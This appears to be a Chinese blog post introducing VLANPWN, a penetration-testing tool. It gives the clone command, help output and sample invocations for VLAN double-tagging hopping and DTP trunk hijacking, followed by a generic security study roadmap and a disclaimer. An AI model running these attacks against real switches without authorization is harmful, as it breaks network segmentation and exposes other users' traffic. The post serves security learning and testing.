Bootstrap

【VLANPWN】一款针对VLAN的安全研究和渗透测试工具

关于VLANPWN

VLANPWN是一款针对VLAN的安全研究和渗透测试工具,该工具可以帮助广大研究人员通过对VLAN执行渗透测试,来研究和分析目标VLAN的安全状况。该工具专为红队研究人员和安全学习爱好者设计,旨在训练网络工程师提升网络的安全性能,请不要将其用于恶意目的。

工具核心脚本

DoubleTagging.py:该脚本旨在执行一次VLAN Hopping攻击(跳跃攻击),该脚本将注入一个包含两个802.1Q标签的帧,并发送测试目的的ICMAP请求。

DTPHijacking.py:该脚本用于执行一次DTP交换机欺骗/劫持攻击,该脚本将发送一个恶意的DTP帧,此时会将测试人员的设备变成主干信道。接下来,我们就可以尝试绕过VLAN网络的分段,并查看VLAN网络中的所有流量数据了。

工具下载

由于该工具基于Python开发,因此我们首先需要在本地设备上安装并配置好Python环境。接下来,使用下列命令将该项目源码克隆至本地:

git clone https://github.com/in9uz/VLANPWN.git
工具帮助
DoubleTagging.py使用帮助
 
  1. python3 DoubleTagging.py --help
  2.  
  3. .s    s.  .s        .s5SSSs.  .s    s.  .s5SSSs.  .s s.  s.  .s    s.
  4.                 SS.       SS.       SS.    SS. SS.       SS.
  5. sS    S%S sS        sS    S%S sSs.  S%S sS    S%S sS S%S S%S sSs.  S%S
  6. SS    S%S SS        SS    S%S SS`S. S%S SS    S%S SS S%S S%S SS`S. S%S
  7. SS    S%S SS        SSSs. S%S SS `S.S%S SS .sS::' SS S%S S%S SS `S.S%S
  8.  SS   S%S SS        SS    S%S SS  `sS%S SS        SS S%S S%S SS  `sS%S
  9.  SS   `:; SS        SS    `:; SS    `:; SS        SS `:; `:; SS    `:;
  10.   SS  ;,. SS    ;,. SS    ;,. SS    ;,. SS        SS ;,. ;,. SS    ;,.
  11.    `:;;:' `:;;;;;:' :;    ;:' :;    ;:' `:        `:;;:'`::' :;    ;:'
  12.  
  13. VLAN Double Tagging inject tool. Jump into another VLAN!
  14.  
  15. Author: Magama Bazarov, <[email protected]>
  16.  
  17. usage: DoubleTagging.py [-h] --interface INTERFACE --nativevlan NATIVEVLAN --targetvlan TARGETVLAN --victim VICTIM --attacker ATTACKER
  18.  
  19. options:
  20.   -h, --help             显示帮助信息和退出
  21.   --interface INTERFACE
  22.                        指定你的网络接口
  23.   --nativevlan NATIVEVLAN
  24.                         指定本地VLAN ID
  25.   --targetvlan TARGETVLAN
  26.                         指定待测试的目标VLAN ID
  27.   --victim VICTIM        指定目标IP
  28.   --attacker ATTACKER   指定攻击者IP

DTPHijacking.py使用帮助
 
  1. python3 DTPHijacking.py --help
  2.  
  3. .s    s.  .s        .s5SSSs.  .s    s.  .s5SSSs.  .s s.  s.  .s    s.
  4.                 SS.       SS.       SS.    SS. SS.       SS.
  5. sS    S%S sS        sS    S%S sSs.  S%S sS    S%S sS S%S S%S sSs.  S%S
  6. SS    S%S SS        SS    S%S SS`S. S%S SS    S%S SS S%S S%S SS`S. S%S
  7. SS    S%S SS        SSSs. S%S SS `S.S%S SS .sS::' SS S%S S%S SS `S.S%S
  8. SS   S%S SS        SS    S%S SS  `sS%S SS        SS S%S S%S SS  `sS%S
  9. SS   `:; SS        SS    `:; SS    `:; SS        SS `:; `:; SS    `:;
  10. SS  ;,. SS    ;,. SS    ;,. SS    ;,. SS        SS ;,. ;,. SS    ;,.
  11.  `:;;:' `:;;;;;:' :;    ;:' :;    ;:' `:        `:;;:'`::' :;    ;:'
  12.  
  13. DTP Switch Hijacking tool. Become a trunk!
  14.  
  15. Author: Magama Bazarov, <[email protected]>
  16.  
  17. usage: DTPHijacking.py [-h] --interface INTERFACE
  18.  
  19. options:
  20. -h, --help            显示帮助信息和退出
  21. --interface INTERFACE
  22.                       指定你的网络接口

工具使用样例
样例一:DoubleTagging.py
python3 DoubleTagging.py --interface eth0 --nativevlan 1 --targetvlan 20 --victim 10.10.20.24 --attacker 10.10.10.54
样例二:DTPHijacking.py
python3 DTPHijacking.py --interface eth0
网络安全学习路线 (2024最新整理)

 如图片过大被平台压缩导致看不清的话,评论区点赞和评论区留言扣1或者关注我我后台会主动发给你! 

第一阶段:安全基础

网络安全行业与法规

Linux操作系统

计算机网络

HTML PHP Mysql Python基础到实战掌握

  第二阶段:信息收集

IP信息收集

域名信息收集

服务器信息收集

Web网站信息收集

Google hacking

Fofa网络安全测绘

 第三阶段:Web安全 

SQL注入漏洞

XSS

CSRF漏洞

文件上传漏洞

文件包含漏洞

SSRF漏洞

XXE漏洞

远程代码执行漏洞

密码暴力破解与防御

中间件解析漏洞

反序列化漏洞

 第四阶段:渗透工具 

MSF

Cobalt strike

Burp suite

Nessus   Appscea   AWVS

Goby   XRay

Sqlmap

Nmap

Kali

 第五阶段:实战挖洞 

漏洞挖掘技巧

Src

Cnvd

众测项目

热门CVE漏洞复现

靶场实战

学习资料的推荐

学习框架已经整理完毕,现在就差资料资源了,我这里整理了所有知识点对应的资料资源文档,大家不想一个一个去找的话,可以参考一下这些资料!

1.视频教程

 2.SRC技术文档&PDF书籍 

3.大厂面试题    

特别声明:

此教程为纯技术分享!本教程的目的决不是为那些怀有不良动机的人提供及技术支持!也不承担因为技术被滥用所产生的连带责任!本教程的目的在于最大限度地唤醒大家对网络安全的重视,并采取相应的安全措施,从而减少由网络安全而带来的经济损失。

;